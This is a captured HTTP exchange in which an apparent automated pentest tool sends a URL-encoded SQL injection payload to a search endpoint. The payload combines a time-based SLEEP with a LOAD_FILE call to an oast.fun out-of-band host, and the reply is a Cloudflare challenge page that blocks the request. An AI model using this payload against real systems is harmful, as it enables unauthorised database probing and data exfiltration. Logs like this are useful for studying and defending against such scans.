REQUEST:
GET https://my.myfirst.tech/search?id=%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%280%29%29%29a%20UNION%20SELECT%20LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0zh4szt4cead121.oast.fun%27%2C%27%5C%5Cb%27%29%29%29--%20-
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9998
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c847413cc2a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=gTBrXuyChxgHYRMAUjxMznkEiB8lKomRc4z%2BQ6GcOE5qqQjBo4SXa9t4ApnRhNZJsI%2Blg6VSsUOa2%2FIpaF33K%2BmgDMBbzs6BLgf4gh3J%2FMj7gJfaiw5q5lnE%2F%2F8XX6VCV3orkMNHr6iWIpXjCQ%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c847413cc2a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'kBS3OusHu1PQpzXbxFCWSjtf_4Pr76c7Uu.CHt9OHxM-1784281154-1.2.1.1-gchUhoHAC37HQZbUqv1M06DarY_qmJpdklHs6hWBWhmaT4SbUaaMKWZce2HM0NUM',cITimeS: '1784281154',cRay: 'a1c847413cc2a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?id=%27+AND+%28SELECT+1+FROM+%28SELECT%28SLEEP%280%29%29%29a+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0zh4szt4cead121.oast.fun%27%2C%27%5C%5Cb%27%29%29%29--+-\u0026__cf_chl_tk=f3ILlYubFpqdIZA7LznePAZ.f68RSvy_vLefraBqY38-1784281154-1.0.1.1-MCyrpIDRlo6QXBZ90eyy_QzXMdzY4Fu.DVAKW9QwZAM",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?id=%27+AND+%28SELECT+1+FROM+%28SELECT%28SLEEP%280%29%29%29a+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0zh4szt4cead121.oast.fun%27%2C%27%5C%5Cb%27%29%29%29--+-\u0026__cf_chl_f_tk=f3ILlYubFpqdIZA7LznePAZ.f68RSvy_vLefraBqY38-1784281154-1.0.1.1-MCyrpIDRlo6QXBZ90eyy_QzXMdzY4Fu.DVAKW9QwZAM",md: 'ZxEPgc0oZgSENOEDHs9fU3bJQ6dRU872Z9hdda0on8M-1784281154-1.2.1.1-hyx3HM44Drb3sw_rUg1k8GQUbhz763hUrvNB.6zICR8cJs0yS2.nLdgZ2Rj5mHg3w9E_o7hmYpPpC8_3y7IcqmcTaj_JIobruMTi.OQBOeAUfOdbJThzQx.UkVBr7IfrBY5DVtcIf4CSzxnNWWrNprjQAoRfxtGpIjP1n5NYlVBABuoOops4RrWBaenbhtA_IeAxCNZIzO0KFdKHihwhcn0thaTtI0fDC76JNJfRiPRYVYMxjv..aRy6NUgilMPhbd6Pm8gFasGNg98l5SUlR0KuMJV8fhfVzOc9yx6qKU0Ci8bMLdzu.wjQ1iWQQiVb_NGqWUXuDbxcshUbJtPCM59jxVZWIixbesBQj0UeUXs4femi2.aRZF5fsrogmBZ8Li_2FJwonF0v0P4MJZJH00jEw2qHpMaGulnRMfIVlAWxklDjmLL1pBsC.5KoVQDrOMF5_Ia7WVrTjkIHw6jBxhSg0yctEK5zFKvM7dt1GTpuoZJ3KHHpqgqS1fBH4w9fnQqCWLL617SngUnWpurFTx1hsnLHxQANP2yzEgqUb0AFgfqo0I.cF1LjQPTCcNyKlL86RapyLhyyclugnnW5NCDSSzmQwyNxe.9.aepUlsqpnSPNSsuJXkyiPRLURPpIdtiIAPFRsT7PE003ldGydN7cHG5V545xq.r8474N2EILaDYubo1MSwV6vizKiaJk0yYOoxSB2yniRA5gt5HoZBHrMaSt555RQjN7T1s4uOzfZTlTctIZ53y.5S_E1q5TvHJbbRPGO.S0vDyd2DRK97ksB6I29Rc0lvpmIqaB_jaZ1BnJHl2pVC5yq6Z9H5gNUush1Sv3G9Tf0KumTAMSHTap147rmrgPxmEcXgI4Vg.s3.N.xySUiIM11.AYoMQcDait3SYsyaJeTBvDj7RHVsu.XipC5rTmYwqT5XqxNbUtxo_mRL_aFLMnwmDs6rm4sxARop8VowDk6WQ7Ql.uDzWyStukg41zv_B426Phm8i0UaicnJeE_aMtJ.VHECJSrwA.MI.RxmFSM.GYj0_OjyZw4Gt1O13nsKBrAbLuNXjB6dopow6foMv2_AyRFsBsGZKQIfRvqPB8v.f7tNMxfedp8GRGWA5sftlO1tv_To6lJCp.yKxnEmxrV0YJ6qjSTYua2u5ANzwQQyc5Vnfqq8VR6pMCHMatObj3kBlaeiKzniDnuSRj79oxOPuk.K2F5fspRtPdygUEqn.ZhF85h00moFW61FOjqsiV9MeNVPlUvdOvbpmspS45.WhT0eHrWvU9yHk0ZiI0pGzdl0dTaDz7ZGVKOM6TiEJmecgs0sV6LY6O7E3ZHswnO5TTjsxA8qwdFXhn.7hatzSfJ0P_BGH5jj_z5a18WoJj9Rm0AK4',mdrd: 'lb08CmmpShc4IDiRQtGvxjQifQSmOOv1JcMTpzazX7g-1784281154-1.2.1.1-0LuLcG2eY.YpjxU7mFFA0_P.xNCs0BrPqm2TIkCZZWHkz9zZPld1ar8eXjmtMYATvEUuppJjjnQAK8PNZz36lTtDUVT8lfJVzqpAauWoGPrgwiVSeD2yqxGkTw_8j9cXmy89NHYxeSfnT7Ep3Z63tK9a_4OGXi7ssbv2S4fv.Bcfkdjx43yNfIvWJrZpFrJg6rjRePjmNg_Y63ffVbV2etSJp0C1Dt_fhW8OYl6XCYbhcoxD5qZpJ7HOMyo7E5VJ',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c847413cc2a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?id=%27+AND+%28SELECT+1+FROM+%28SELECT%28SLEEP%280%29%29%29a+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0zh4szt4cead121.oast.fun%27%2C%27%5C%5Cb%27%29%29%29--+-\u0026__cf_chl_rt_tk=f3ILlYubFpqdIZA7LznePAZ.f68RSvy_vLefraBqY38-1784281154-1.0.1.1-MCyrpIDRlo6QXBZ90eyy_QzXMdzY4Fu.DVAKW9QwZAM"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
